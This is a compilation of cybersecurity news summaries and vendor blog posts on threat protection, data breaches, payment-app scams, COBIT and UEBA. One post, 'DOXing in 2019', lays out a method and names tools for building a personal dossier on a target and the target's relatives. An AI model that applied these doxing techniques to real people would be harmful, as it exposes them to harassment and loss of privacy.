Organizations that use Advanced Threat Protection are better prepared to detect threats and remove them in order to minimize the damage. A good provider focuses on the lifecycle of attacks to manage threats in real time. They also notify the organization about attacks that have occurred, what happened as a result, and how they were stopped.

Either managed within the organization or offered as a service, Advanced Threat Protection solutions provide critical defense against major and potentially damaging attacks.

The post What Is Advanced Threat Protection? appeared first on .

SLAs: What your cybersecurity vendor isn’t telling you

Service Level Agreements (SLAs) have been used in the IT world for many years as a contractual mechanism for holding service providers accountable and extracting defined payments and penalties when they mess up. Likewise, vendors have used SLAs to put their “money where their mouth is” in terms of fulfilling value promises and establishing important metrics for their customers. In reality, SLAs have not kept up with either of these purposes. For most IT pros, … More

The post SLAs: What your cybersecurity vendor isn’t telling you appeared first on Help Net Security.

Businesses need to treat cybersecurity as something that crosses organizational boundaries

Companies are working to balance their desire for new innovations with their need for strong cyber-defenses, according to a new report from CompTIA. CompTIA’s “Cybersecurity for Digital Operations,” based on a survey of 500 U.S. businesses, also reveals that company executives, business staff and technology professionals have distinctly different views on where their organization stands when it comes to cyber-readiness. The stakes have never been higher for business operations, and public and private safety, according … More

The post Businesses need to treat cybersecurity as something that crosses organizational boundaries appeared first on Help Net Security.

The use of open source software in DevOps has become strategic for organizations of all sizes

A higher percentage of top performing teams in enterprise organizations are using open source software, according to a survey conducted by DevOps Research and Assessment (DORA) and Google Cloud. Additionally, the proportion of Elite performers (highest performing teams) nearly tripled from last year, showing that DevOps capabilities are driving performance. These findings reflect organizations’ increased willingness to embrace investments in technology to deliver value and the use of open source – even in highly regulated, … More

The post The use of open source software in DevOps has become strategic for organizations of all sizes appeared first on Help Net Security.

Improving the security, privacy and safety of future connected vehicles

The security, privacy and safety of connected autonomous vehicles (CAVs) has been improved thanks to testing at WMG, University of Warwick. CAVs can now connect to each other and to roadside infrastructure, and roadside infrastructure units can connect to each other, more securely. In the near future connected and autonomous vehicles are expected to become widely used across the UK. To ensure a smooth deployment, researchers from WMG, University of Warwick undertook real-world testing of four academic innovations in the … More

The post Improving the security, privacy and safety of future connected vehicles appeared first on Help Net Security.

Benefits and Best Practices of Adaptive Security

The DevOps environment has been changing rapidly, and adaptive security has become a widely used response to this. The main purpose of adaptive security is to create layers of security providing threat detection, visibility, and prevention that continue to evolve and become better.

History of Adaptive Security

The term “Adaptive Security Architecture” was created in 2008 by Sun Microsystems, which was acquired by Oracle in 2010. It was designed to anticipate and respond to threats, all while reducing threat amplification, velocity, attack surface, and the recovery time. This is an architectural model that imitates a biological immune system from a microscopic level.

Biological systems are designed to respond to changing conditions and adapt. They are able to respond to threats in a dynamic way, which mimics the involuntary immune system response. These systems are made of several components that are not dependent on one entity in order to survive.

Defining Adaptive Security

Adaptive security is a security model that monitors threats continuously and improves as threats change and evolve. With traditional security methods, organizations rely on firewalls, intrusion detection systems (IDS), antivirus software, and intrusion prevention systems (IPS). While these are a powerful defense, they are no longer enough on their own. Environments are no longer static, and security systems should be integrated into continuous-deployment IT.

Adaptive Security Benefits

The main benefit of adaptive security is early detection of threats and an automatic, autonomous response to any malicious event. Other benefits include:

  • Containing threats when they occur.
  • Preventing the theft and sabotage of data.
  • Reducing threat dwell time.
  • Stopping the spread of an infection across systems (the “pandemic” of the immune-system metaphor).
  • Recognizing ongoing security breaches.
  • Avoiding a monoculture systems environment.

Adaptive security is designed to evolve and be more complex in order to defend against evolving security threats.

Best Practices of Adaptive Security

There are four stages in adaptive security architecture:

  1. Predict: Assess the risk, anticipate malware and attacks, and then implement the baseline systems.
  2. Prevent: Isolate and harden systems, thus preventing security breaches.
  3. Respond: Investigate incidents, design policy changes, and conduct a retrospective analysis.
  4. Detect: Prioritize risks and defects, and learn how to contain threats and incidents.

Combining these four stages creates a system with the ability to respond to suspicious behaviors.

Adaptive Security Solutions

An effective adaptive security system requires a robust solution that combines different features and measures to predict threats and to provide comprehensive network and endpoint protection.

A proactive approach to security enables organizations to adapt to ever-changing threats. And this is exactly what adaptive security provides.


The post Benefits and Best Practices of Adaptive Security appeared first on .

Security is slowly becoming essential to doing business

A veteran of the information security industry, Greg Jensen has spent the last six years at Oracle as the Senior Director of Oracle’s Cloud Security solutions. He’s also the Senior Editor of the Oracle and KPMG Cloud Threat Report, as well as Oracle’s annual CISO Report. “The focus of these efforts is to understand the key challenges that hundreds of global organizations are struggling with as they lift and shift workloads to the cloud, and … More

The post Security is slowly becoming essential to doing business appeared first on Help Net Security.

Confidential data of 24.3 million patients discovered online

Greenbone Networks has released details of new research into the security of the servers used by health providers across the world to store images of X-rays as well as CT, MRI and other medical scans. Of the 2,300 medical image archive systems worldwide that Greenbone analyzed between mid-July and early September 2019, 590 of them were freely accessible on the internet, together containing 24.3 million data records from patients located in 52 different countries. … More

The post Confidential data of 24.3 million patients discovered online appeared first on Help Net Security.

Businesses facing post breach financial fallout by losing customer trust

44% of Americans, 38% of Brits, 33% of Australians, and 37% of Canadians have been the victim of a data breach, according to newly released research conducted by PCI Pal. The findings suggest that a combination of recent high-profile data breaches in each region, the development of assorted laws and regulations to protect consumer data privacy (e.g. the California Consumer Privacy Act, Europe’s General Data Protection Regulations, Canada’s Personal Information Protection and Electronic Documents Act, … More

The post Businesses facing post breach financial fallout by losing customer trust appeared first on Help Net Security.

Solving the Gamer’s Dilemma: Security vs. Performance

As of last year, 2.2 billion[1] people consider themselves gamers across the globe. Of that 2.2 billion, over 50% – 1.22 billion[2] – play their game of choice on a PC. The sheer number of PC gamers throughout the world, however, has sparked the interest of cybercriminals, and cyberthreats targeting gamers have spiked. Threats including malware, potentially unwanted programs (PUPs), phishing, account takeovers (ATO), and more have slowly started to permeate gamers’ domains at an alarming level.

PC gamers often adopt weaker security measures, as they’re concerned about the potential negative impact on in-game performance. At the same time, they are the most connected online users, meaning their exposure to threats is generally higher. While they recognize and understand the importance of cybersecurity, they do not want to sacrifice performance for security. The gamer’s dilemma – security versus performance – is the crux of why gamers put security second, even though the average gamer has experienced almost five cyberattacks.

There’s good news though – McAfee Gamer Security is here to counter the notion that antivirus slows gamers down. This brand-new security solution from McAfee provides gamers with the security they need without sacrificing performance or creating in-game slowdowns, such as drops in frames per second (FPS) and lag. Built from the ground up, this solution delivers performance optimization by monitoring key system metrics coupled with the ability to manually kill resource hogs on-the-fly, while automatically prioritizing resources and pausing background services. McAfee Gamer Security also features cloud-based MicroAV, which offloads detection from the system to the cloud for all the protection gamers could want or need, without the “bloat” that usually accompanies security software.

While McAfee Gamer Security is now available for purchase, in spring 2019 McAfee surveyed users that participated in beta testing. Here’s how they responded to a few questions we asked:

Overall, what impact, if any, did you feel in your gaming experience?

“I believe I had [experienced] a positive impact of the software during my overall use of the program because it increased the speed of my game as well as gave me peace of mind that I…[stayed] protected during my gameplay.”

What one benefit would make you talk about McAfee Gamer Security to your friends? What is the primary reason for your choice? 

“Good security which doesn’t slow down my system; Normally, antiviruses…hog background resources [and] you trade performance for security. McAfee Gamer Security offers the best of both worlds, without contradicting each other.”

Overall, how useful or not useful has Gamer Security been?

“Every couple [of] hours or so while gaming, I…used the software to check up on my RAM/GPU/CPU performance and make sure my system isn’t bottlenecking, there aren’t any irregularities, etc. I also really like that I can experience a boost in my gameplay without having to take the risk of overclocking my components.”

In addition to using a security solution like McAfee Gamer Security, here are some other general tips to help you stay secure while playing your favorite video game:

  1. Ensure all applications, hardware and software are up-to-date. Cybercriminals can take advantage of software, hardware, and application vulnerabilities to spread cyberthreats, such as malware. Keep your devices and applications updated with the latest security patches and fixes to help combat this threat.
  2. Periodically visit your device to add/remove programs. Some apps on your device may be vampirically siphoning in-game performance. Remove apps that you do not need or no longer use.
  3. Create strong, unique passwords. Over 55% of gamers re-use the same password across accounts for online gaming services. And while it might be easier to remember the same password, reusing credentials across multiple accounts could put the hundreds, or even thousands, of invested hours in leveling up characters and gathering rare items at risk in the event one account is breached. Be sure to construct a complex password that is difficult to guess.

And, as always, stay on top of the latest consumer and gaming security threats with @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Footnotes

  1. Number of active video gamers worldwide from 2014 to 2021 (in millions), Statista, 2019
  2. Number of active PC gamers worldwide from 2014 to 2021 (in millions), Statista, 2019

The post Solving the Gamer’s Dilemma: Security vs. Performance appeared first on McAfee Blogs.

WhatsApp ‘Delete for Everyone’ Doesn’t Delete Media Files Sent to iPhone Users

Mistakenly sent a picture to someone via WhatsApp that you shouldn't have? Well, we've all been there, but what's more unfortunate is that the 'Delete for Everyone' feature WhatsApp introduced two years ago contains an unpatched privacy bug, leaving its users with a false sense of privacy. WhatsApp and its rival Telegram messenger offer "Delete for Everyone," a potentially life-saving feature

Targeted threat intelligence and what your organization might be missing

In this Help Net Security podcast recorded at Black Hat USA 2019, Adam Darrah (Director of Intelligence), Mike Kirschner (Chief Operating Officer) and Christian Lees (Chief Technology Officer) from Vigilate, talk about how their global threat hunting and dark web cyber intelligence research team extends the reach of a company’s security resources, and lives within the underground community to remain ahead of emerging threats. Where many other solutions rely on machine learning (ML) to access … More

The post Targeted threat intelligence and what your organization might be missing appeared first on Help Net Security.

Researchers uncover 125 vulnerabilities across 13 routers and NAS devices

In a cybersecurity study of network attached storage (NAS) systems and routers, Independent Security Evaluators (ISE) found 125 vulnerabilities in 13 IoT devices, reaffirming an industrywide problem of a lack of basic security diligence. The vulnerabilities discovered in the SOHOpelessly Broken 2.0 research likely affect millions of IoT devices. “Our results show that businesses and homes are still vulnerable to exploits that can result in significant damage,” says lead ISE researcher Rick Ramgattie. “These issues … More

The post Researchers uncover 125 vulnerabilities across 13 routers and NAS devices appeared first on Help Net Security.

Phishing attacks up, especially against SaaS and webmail services

Phishing attacks continued to rise into the summer of 2019 with cybercrime gangs’ focus on branded webmail and SaaS providers remaining very keen, according to the APWG report. The report also documents how criminals are increasingly perpetrating business email compromise (BEC) attacks by using gift card cash-out schemes. The number of phishing attacks observed in the second quarter of 2019 eclipsed the number seen in the three quarters before. The total number of phishing sites … More

The post Phishing attacks up, especially against SaaS and webmail services appeared first on Help Net Security.

DOXing in 2019

During the early 2000s, in private chats or even in public IRC channels, self-styled “hackers” used to DOX people in order to prove their competence in the “dark arts” (cit. Proceedings of the 39th SIGCSE). I was always fascinated by those people who, with little information such as an email address or a nickname, were able to find out much of your entire life just by looking on the web. Today, several years later, a friend of mine asked me to start a DOX session against himself in order to evaluate what the ‘Internet’ knows about him.

What is DOX ?

“Doxing” is a neologism that has evolved over its brief history. It comes from a spelling alteration of the abbreviation “docs” (for “documents”) and refers to “compiling and releasing a dossier of personal information on someone”. Essentially, doxing is revealing and publicizing records of an individual, which were previously private or difficult to obtain.

The term dox derives from the slang “dropping dox” which, according to Wired writer Mat Honan, was “an old-school revenge tactic that emerged from hacker culture in 1990s”. Hackers operating outside the law in that era used the breach of an opponent’s anonymity as a means to expose opponents to harassment or legal repercussions.

wikipedia: about DOXing

Nowadays the word DOX, or the action of DOXing someone, has a bad connotation, since it undermines the victim’s privacy by publicly exposing sensitive data that the DOXer (i.e. whoever is performing the DOXing) has collected and/or correlated. I will not expose any data, but I’ll take the chance to review techniques and tools in order to give my readers an updated view of DOXing tools in 2019.

DOXing methodology

When you start a DOXing session you can either play it by ear or approach the problem with a methodology. Methodologies are not simple here, since you need to map a back-to-forward (and vice versa) information flow. In other words, you need to anticipate information about the victim that you might get from a victim’s peer or relative, so you need to be able to move from one peer to another and to stop when you are moving too far from the original victim. The feeling that stops you from getting too far from the original victim is hard to define; we might decide to use an information threshold such as: after [random number] of iterations, or only public social profiles, or, going deeper, everything that does not involve another entity. Any threshold we define can be overkill or too restrictive in the same way. So my best advice is to follow the path until you feel you are getting too far from your target; at that point go back over the information collected and start to focus on another path. The following image shows a simple flow that you might decide to take.

Simplified DOXing Flow

A simple but useful piece of advice is to take note of every finding from both manual and automatic analysis. It may sound like a trivial suggestion, but I’m sure you will appreciate it once you get your hands dirty with the amount of data you might find! I’m used to Maltego, since it automates many search steps, but there are many great tools out there: find your best fit and keep notes of what you do!

Example from Maltego Blog

Used Tools

Fortunately there are a lot of OSINT/Personal-INT tools that are worth using. In the following list I’ve selected just some of them, the ones I personally think give the best results in 2019.

  • Doxing (by Hacking Live). It is not very up to date, but then Doxing is an ancient practice! It works quite well and helps automate many searches.
  • DoxTracker (by Kuro-Code). It will definitely help automate your searches, since it includes many tracking web sites.
  • Maltego (by Paterva). Perhaps the king of public information gathering; depending on how many services you sign in to (services are information sources), it extracts a great deal of information on your target.
  • FOCA (by Elevenpaths). FOCA (github) is another great and well-known tool that lets you automate many search tasks. Unfortunately it runs only on Windows, so if you are a Unix/FreeBSD user you need to emulate a Windows OS.
  • FamilyTree. A great tool to try. If you are lucky and your target is in their DB, you will get a great deal of information on his relatives.
  • TruePeopleSearch. Very useful for finding out addresses and/or phone numbers. It mainly works for the US, though.
  • PeekYou. It works well by searching various sources, including social networks and phone books, and it works regardless of the target’s country.
  • Lullar. Another great social aggregation profiler. You can enter a first and last name, a nickname or the target’s email; it will check whether the target is on social networks and provide a direct link to the target’s social profiles.
  • CheckUserNames. Sometimes you want to check whether specific usernames exist on social networks; CheckUserNames works well for that.
  • TinEye, Google Image Search. When you investigate pictures you may need to locate where a specific picture comes from; to do that, you can search for similar pictures and look at the comments/tags on them in order to find the original.
  • Git-Fingerprint. Sometimes your target knows Git and may be using it.
  • PictaME. Useful if you need to analyze Instagram profiles or check Instagram pictures without an Instagram account.

It may be obvious, I know… but don’t forget Google searches. Automatic searches are great since they speed you up, but Google and Bing hold a lot of information on your target. My best findings come from manual searches on Google, correlating social comments and images.

This activity produced an acclaimed newspaper article in the Scienze section of “La Repubblica” (the biggest Italian newspaper) on 12 September 2019.

Scienze, “La Repubblica”, 12 September 2019

CISO do’s and don’ts: Lessons learned

Keeping a business safe from cyber threats while allowing it to thrive is every CISO’s goal. The task is not easy: a CISO has to keep many balls in the air while being buffeted by an increasingly complex and always shifting threat landscape. Consequently, the importance of a good CISO should not be underestimated. Mistakes to avoid, practices to implement: Francesco Cipollone, CISO and director at UK-based cybersecurity consultancy NSC42, says that he has seen … More

The post CISO do’s and don’ts: Lessons learned appeared first on Help Net Security.

Threat visibility is imperative, but it’s even more essential to act

Cyberthreats are escalating faster than many organizations can identify, block and mitigate them. Visibility into the expanding threat landscape is imperative, but according to a new threat report released by CenturyLink, it is even more essential to act. “As companies focus on digital innovation, they are entering a world of unprecedented threat and risk,” said Mike Benjamin, head of CenturyLink’s threat research and operations division, Black Lotus Labs. “Threats continue to evolve, as do bad … More

The post Threat visibility is imperative, but it’s even more essential to act appeared first on Help Net Security.

Four in five businesses need ways to better secure data without slowing innovation

While data loss protection is critical to Zero Trust (ZT), fewer than one in five organizations report their data loss prevention solutions provide transformational benefits and more than 80 percent say they need a better way to secure data without slowing down innovation, according to Code42. ZT architectures are based on the principle of “trust no one, verify everything,” abolishing the idea of a trusted network within a data security perimeter and requiring companies to … More

The post Four in five businesses need ways to better secure data without slowing innovation appeared first on Help Net Security.

Exploitation of IoT devices and Windows SMB attacks continue to escalate

Cybercriminals upped the intensity of IoT and SMB-related attacks in the first half of 2019, according to a new F-Secure report. The report underscores the threats IoT devices face if not properly secured when online, as well as the continued popularity of Eternal Blue and related exploits two years after WannaCry. F-Secure’s honeypots – decoy servers that are set up to lure in attackers for the purpose of collecting information – measured a twelvefold increase … More

The post Exploitation of IoT devices and Windows SMB attacks continue to escalate appeared first on Help Net Security.

Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know

I can’t recall the last time I gave my teenage daughter cash for anything. If she needs money for gas, I Venmo it. A Taco Bell study break with the roommates? No problem. With one click, I transfer money from my Venmo account to hers. She uses a Venmo credit card to make her purchase. To this mom, cash apps may be the best thing to happen to parenting since location tracking became possible. But as convenient as these apps may be, are they safe for your family to use?

How do they work?

The research company, eMarketer, estimates that 96.0 million people used Peer-to-Peer (P2P) payment services this year (that’s 40.4% of all mobile phone users), up from an estimated 82.5 million last year.

P2P technology allows you to create a profile on a transfer app and link your bank account or credit card to it. Once your banking information is set up, you can locate another person’s account on the app (or invite someone to the app) and transfer funds instantly into their P2P account (without the hassle of getting a bank account number, email, or phone number). That person can leave the money in their app account, move it into his or her bank account, or use a debit card issued by the P2P app to use the funds immediately. If the app offers a credit card (like Venmo does), the recipient can use the Venmo card like a credit card at retailers most anywhere. 

Some of the more popular P2P apps include Venmo, Cash App, Zelle, Apple Pay, Google Wallet, PayPal.me, Facebook Messenger, and Snapcash, among others. Because of the P2P platform’s rapid growth, more and more investors are entering the market each day to introduce new cash apps, which is causing many analysts to speculate on the need for paper check transactions in the future.

Are they safe?

While sending your hard-earned money back and forth through cyberspace on an app doesn’t sound safe, in general, it is. Are there some exceptions? Always. 

Online scam trends often follow consumer purchasing trends and, right now, the hot transaction spot is P2P platforms. Because P2P money is transferred instantly (and irreversibly), scammers exploit this and are figuring out how to take people’s money. After getting a P2P payment, scammers delete their accounts and disappear, instantly.

In 2018 Consumer Reports (CR) compared the potential financial and privacy risks of five mobile P2P services with a focus on payment authentication and data privacy. CR found all the apps had acceptable encryption but some were dinged for not clearly explaining how they protected user data. The consumer advocacy group ranked app safety strength in this order: Apple Pay, Venmo, Cash App, Facebook Messenger, and Zelle. CR also noted they “found nothing to suggest that using these products would threaten the security of your financial and personal data.”

While an app’s architecture may be deemed safe, no app user is immune from scams, which is where safe use of the app makes all the difference. If your family uses P2P apps regularly, confirm that each user understands the potential risks. Here are just a few of the schemes that have been connected to P2P apps.


Potential scams

Fraudulent sellers. This scam targets an unassuming buyer who sends money through a P2P app to purchase an item from someone they met online. The friendly seller casually suggests the buyer “just Venmo or Cash App me.” The buyer sends the money, but the item is never received, and the seller vanishes. This scam has been known to happen in online marketplaces and other trading sites and apps.

Malicious emails. Another scam is sending people an email telling them that someone has deposited money in their P2P account. They are prompted to click a link to go directly to the app, but instead, the malicious link downloads malware onto the person’s phone or computer. The scammer can then glean personal information from the person’s devices. To avoid a malware attack, consider installing comprehensive security software on your family’s computers and devices.

Ticket scams. Beware of anyone selling concert or sporting event tickets online. Buyers can get caught up in the excitement of scoring tickets for their favorite events and send the money via a P2P app, only for the seller to leave them empty-handed.

Puppy and romance scams. In this cruel scam, a pet lover falls in love with a photo of a puppy online, uses a P2P app to pay for it, and the seller deletes his or her account and disappears. Likewise, catfish scammers gain someone’s trust. As the romantic relationship grows, the fraudulent person eventually asks to borrow money. The victim sends money using a P2P app only to have their love interest end all communication and vanish.  

P2P safety: Talking points for families

Only connect with family and friends. When using cash apps, only exchange money with people you know. Unlike an insured bank, P2P apps do not refund the money you’ve paid out accidentally or in a scam scenario. P2P apps hold users 100% responsible for transfers. 

Verify details of each transfer. The sender is responsible for funds, even in the case of an accidental transfer. So, if you are paying Joe Smith your half of the rent, be sure you select the correct Joe Smith (not Joe Smith_1 or Joe Smithe) before you hit send. There could be dozens of name variations to choose from in an app’s directory. Also, verify with your bank that each P2P transaction registers.

Avoid public Wi-Fi transfers. Public Wi-Fi is susceptible to hackers trying to access valuable financial and personal information. For this reason, only use a secure, private Wi-Fi network when using a P2P payment app. If you must use public Wi-Fi, consider using a Virtual Private Network (VPN).


Don’t use P2P apps for business. P2P apps are designed to be used between friends and include no-commercial-use clauses in their policies. For larger business transactions, such as buying and selling goods or services, use apps like PayPal.

Lock your app. When you have a P2P app on your phone, it’s like carrying cash. If someone steals your phone, they can go into an unlocked P2P app and send themselves money from your bank account. Set up extra security on your app. Most apps offer PINs, fingerprint IDs, and two-factor authentication. Also, always lock your device home screen.

Adjust privacy settings. Venmo includes a feed that auto shares when users exchange funds, much like a social media feed. To avoid a stranger seeing that you paid a friend for Ed Sheeran tickets (and won’t be home that night), be sure to adjust your privacy settings. 

Read disclosures. One way to assess an app’s safety is to read its disclosures. How does the app protect your privacy and security? How does the app use your data? What is the app’s error-resolution policy? Feel secure with the app you choose.

We’ve learned that the most significant factor in determining an app’s safety comes back to the person using it. If your family loves using P2P apps, be sure to take the time to discuss the responsibility that comes with exchanging cash through apps. 

The post Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know appeared first on McAfee Blogs.

The rise of modern applications, DevSecOps and the intelligence economy

There has been significant year-over-year growth in enterprise usage trends around multi-cloud adoption, open source technologies such as Kubernetes, and AWS cloud-native services adoption, a Sumo Logic report reveals. The research also shows the increasing need for cloud-based security solutions such as cloud SIEM to help enterprises address today’s increasingly complex security landscape. The intelligence economy: The report also provides a summary of three major trends shaping digital business today: the rise of modern applications, … More

The post The rise of modern applications, DevSecOps and the intelligence economy appeared first on Help Net Security.

Security leaders lack confidence in the supply chain, fear third-party attacks

An overwhelming number of cybersecurity professionals (89%) have expressed concerns about the third-party managed service providers (MSPs) they partner with being hacked, according to new research from the Neustar International Security Council. Survey participants in July 2019 comprise 314 professionals from across six EMEA and US markets. While most organizations reported working with an average of two to three MSPs, less than a quarter (24%) admitted to feeling very confident in the safety barriers they … More

The post Security leaders lack confidence in the supply chain, fear third-party attacks appeared first on Help Net Security.

Interacting with governments in the digital age: What do citizens think?

Most U.S. citizens acknowledge and accept that state and local government agencies share their personal data, even when it comes to personal information such as criminal records and income data, according to a new survey conducted by YouGov and sponsored by Unisys. However, the survey found they remain concerned about the security of the data. The survey of nearly 2,000 (1,986) U.S. citizens living in eight states found that more than three-quarters (77%) accept that … More

The post Interacting with governments in the digital age: What do citizens think? appeared first on Help Net Security.

Cyber risk assessment of U.S. election commissions finds critical areas for improvement

Many election commissions are focused on quickly adapting and updating their cybersecurity; however, commissions still need to dedicate resources to updating outdated operating systems and protecting their email domains from being spoofed, according to NormShield. The report, which examined more than 100 items, focused on the broader picture — the internet facing infrastructure that supports state election processes. NormShield conducted two risk assessments (July and August) of 56 election commissions and Secretaries of State (SoS) … More

The post Cyber risk assessment of U.S. election commissions finds critical areas for improvement appeared first on Help Net Security.

Millions of Car Buyer Records Exposed: How to Bring This Breach to a Halt

Buying a car can be quite a process and requires a lot of time, energy, and research. What most potential car buyers don’t expect is to have their data exposed for all to see. But according to Threatpost, this story rings true for many prospective buyers. Over 198 million records containing personal, loan, and financial information on prospective car buyers were recently leaked due to a database that was left without password protection.

The database belonged to Dealer Leads, a company that gathers information on prospective buyers through a network of targeted websites. These targeted websites provide car-buying research information and classified ads for visitors, allowing Dealer Leads to collect this information and send it to franchise and independent car dealerships to be used as sales leads. The information collected included records with names, email addresses, phone numbers, physical addresses, IP addresses, and other sensitive or personally identifiable information – 413GB worth of this data, to be exact. What’s more, the exposed database contained ports, pathways, and storage info that cybercriminals could exploit to access Dealer Lead’s deeper digital network.

Although the database has been closed off to the public, it is unclear how long it was left exposed. And while it’s crucial for organizations to hold data privacy to the utmost importance, there are plenty of things users can do to help safeguard their data. Check out the following tips to help you stay secure:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your accounts for unusual activity. This will help you stop fraudulent activity in its tracks.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Millions of Car Buyer Records Exposed: How to Bring This Breach to a Halt appeared first on McAfee Blogs.

What is the COBIT and why you need to know about it

Business processes today are largely dictated by the technology around them. Cloud computing, big data, and social media are just a few technologies that shape and affect a business as they generate huge amounts of data. This can be used to get ahead of the competition, but it also creates challenges in terms of governance and management. This is where the COBIT comes into play.

Defining Control Objectives for Information and Related Technologies

The Control Objectives for Information and Related Technologies, or more commonly known as the COBIT, was designed to help organizations and businesses implement, monitor, develop, and improve their information management and IT governance.

The COBIT was established by the Information Systems Audit and Control Association, or ISACA. They published this framework together with the IT Governance Institute, or ITGI.

The Evolution of the COBIT

The COBIT was initially published in the mid-1990s. The focus was mainly on doing audits, specifically on helping financial auditors navigate IT frameworks. Today, it has evolved to doing more than just audits. The third version of the COBIT released by ISACA introduced management guidelines.

The fourth version added guidelines on ICT governance. The latest version used today, released in 2014, focused more on information governance, along with risk management.

Core Principles of the COBIT 5

The COBIT 5, the latest in this series, is centered around five core principles:

  1. Meeting the needs of stakeholders.
  2. Having a comprehensive coverage of the organization.
  3. Creating a single unified framework.
  4. Creating a more holistic approach for business.
  5. Making a distinction between management and governance.

The COBIT Framework Goals

The latest release of the COBIT framework puts together the guidelines from the fourth version, along with Val IT 2.0, and the Risk IT Framework. According to ISACA, these updates are meant to:

  • Streamline information sharing within the organization.
  • Use strategy and IT to achieve business goals.
  • Minimize security risks on information and provide more controls.
  • Provide efficient costing for technology and IT.
  • Integrate recent findings into the COBIT framework.

Companies making use of several frameworks like CMMI and ITIL will find it easier to govern their IT.

Benefits of the COBIT 5

There are several benefits associated with the COBIT 5. First, it allows you to supervise and manage information security in a more efficient manner. It helps ensure compliance and manage vulnerabilities.

When it comes to risk management, the COBIT 5 allows you to improve on the enterprise risk and keep one step ahead of evolving regulatory compliances.

Framework of the COBIT 5

There are several components that make up the COBIT 5, including:

Main Framework

This creates the basic guidelines, foundation, and best practices related to IT governance. They are then integrated with the needs and requirements of the organization. The main goal of the main framework is to allow the organization to align its goals with its IT.

Process Descriptions

This allows the business to have a reference process model, along with a common language used by each member of the organization. The descriptions cover planning, creating, implementing, and monitoring the processes involved in IT. This helps everyone in the organization understand the processes and terminologies.

Control Objectives

This is where the complete list of requirements can be found for effective control of the processes involved in IT. This can actually help improve all IT processes.

Management Guidelines

These guidelines of the COBIT detail people’s responsibilities and what tasks are expected of them. They also show how to measure the organization’s performance with implementing the COBIT 5.

Maturity Models

These models assess the company’s maturity in terms of coping with growth. This helps plug the gaps, if any are found.

The COBIT Certifications

The COBIT 5 certification is available from ISACA, which teaches you all about this framework, along with:

  • How to apply the COBIT 5 in essentially any situation.
  • How to use this with other frameworks.
  • How to understand what challenges this framework addresses.

There are two paths to certification:

  1. Implementation path, which focuses more on the application of the COBIT 5 in business models and challenges.
  2. ASSESSOR path, which focuses more on how to review processes that require change.

The COBIT certification is useful for many companies and roles such as IT directors, managers, audit committee members, and more.


Iron Man’s Instagram Hacked: Snap Away Cybercriminals With These Social Media Tips

Celebrities: they’re just like us! Well, at least in the sense that they still face common cyberthreats. This week, “Avengers: Endgame” actor Robert Downey Jr. was added to the list of celebrities whose social media accounts have been compromised. According to Bleeping Computer, a hacker group managed to take control of the actor’s Instagram account, sharing enticing but phony giveaway announcements.

The offers posted by the hackers included 2,000 iPhone XS devices, MacBook Pro laptops, Tesla cars, and more. In addition to the giveaways added to the actor’s story page, the hackers also changed the link in his account bio, pointing followers to a survey page designed to collect their personal information that could be used for other scams. The tricky part? The hackers posted the link using the URL shortening service Bitly, preventing followers from noticing any clues as to whether the link was malicious or not.

This incident serves as a reminder that anyone with an online account can be vulnerable to a cyberattack, whether you have superpowers or not. In fact, over 22% of internet users reported that their online accounts have been hacked at least once, and more than 14% said that they were hacked more than once. Luckily, there are some best practices you can follow to help keep your accounts safe and sound:

  • Don’t interact with suspicious messages, links, or posts. If you come across posts with offers that seem too good to be true, they probably are. Use your best judgment and don’t click on suspicious messages or links, even if they appear to be posted by a friend.
  • Alert the platform. Flag any scam posts or messages you encounter on social media to the platform so they can stop the threat from spreading.
  • Use good password hygiene. Make sure all of your passwords are strong and unique.
  • Don’t post personal information. Posting personally identifiable information on social media could potentially allow a hacker to guess answers to your security questions or make you an easier target for a cyberattack. Keep your personal information under wraps and turn your account to private.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Iron Man’s Instagram Hacked: Snap Away Cybercriminals With These Social Media Tips appeared first on McAfee Blogs.

On Cybersecurity Insurance

Good paper on cybersecurity insurance: both the history and the promise for the future. From the conclusion:

Policy makers have long held high hopes for cyber insurance as a tool for improving security. Unfortunately, the available evidence so far should give policymakers pause. Cyber insurance appears to be a weak form of governance at present. Insurers writing cyber insurance focus more on organisational procedures than technical controls, rarely include basic security procedures in contracts, and offer discounts that only offer a marginal incentive to invest in security. However, the cost of external response services is covered, which suggests insurers believe ex-post responses to be more effective than ex-ante mitigation. (Alternatively, they can more easily translate the costs associated with ex-post responses into manageable claims.)

The private governance role of cyber insurance is limited by market dynamics. Competitive pressures drive a race-to-the-bottom in risk assessment standards and prevent insurers including security procedures in contracts. Policy interventions, such as minimum risk assessment standards, could solve this collective action problem. Policy-holders and brokers could also drive this change by looking to insurers who conduct rigorous assessments. Doing otherwise ensures adverse selection and moral hazard will increase costs for firms with responsible security postures. Moving toward standardised risk assessment via proposal forms or external scans supports the actuarial base in the long-term. But there is a danger policyholders will succumb to Goodhart's law by internalising these metrics and optimising the metric rather than minimising risk. This is particularly likely given these assessments are constructed by private actors with their own incentives. Search-light effects may drive the scores towards being based on what can be measured, not what is important.

EDITED TO ADD (9/11): BoingBoing post.

Defining and Understanding User and Entity Behavior Analytics (UEBA)

User and Entity Behavior Analytics, or UEBA for short, provides you with a comprehensive solution for IT security while helping find and detect any user or anomaly that might be harmful to the network.

Defining UEBA

This is basically a cybersecurity solution that can recognize and essentially remember normal user behavior. As such, it can identify weird or anomalous instances whenever a user or an entity deviates from their regular “pattern.” A good example of this is if a user normally downloads 10MB worth of data in a day, but suddenly starts to download 100GB, the UEBA would detect this as anomalous and flag it.

A great feature of UEBA is that it uses a combination of machine learning, statistical analysis, and complex algorithms in order to detect deviations in patterns that can lead to harmful effects for the entire system. The UEBA can essentially aggregate the data that you have.

The main difference with UEBA is that it does not track events or monitor devices; instead, it tracks the actions of all the organization’s users and its entities. It focuses more on insider threats, which can include rogue employees or those who have been compromised by outside machinations.

Benefits of UEBA

